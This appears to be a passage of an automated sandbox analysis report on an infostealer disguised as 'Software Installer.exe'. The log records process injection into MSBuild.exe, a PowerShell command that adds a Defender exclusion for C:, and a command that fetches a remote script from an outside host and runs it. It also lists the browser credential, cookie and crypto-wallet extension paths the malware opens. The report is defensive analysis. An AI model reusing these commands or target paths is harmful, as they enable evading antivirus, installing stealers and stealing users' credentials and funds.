Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45F000Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EE2008Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDE2020 cpuid 11_2_00007FF7ECDE2020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD24BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00007FF7ECDD24BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Software Installer.exe, 00000000.00000003.2141927019.000001D774DF9000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1758956113.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1763079562.000001D774E28000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1762893528.000001D774DF1000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2142400706.000001D774E28000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653541198.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1911748693.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2138571362.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2439185166.000001D774DBD000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1561797642.000001D774DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `xX7DYqMEC6zybRIKbKQNtWjDU8uf67JAXX4ffHZ3QCkabZm1hpQ15oqS4ldMEFJYEt4erFotw24cl5JZvQNXjsjoQUZbVZpY
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
Source: MSBuild.exe, 0000000D.00000002.1762285185.0000000001145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
Source: Software Installer.exeString found in binary or memory: get_MachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
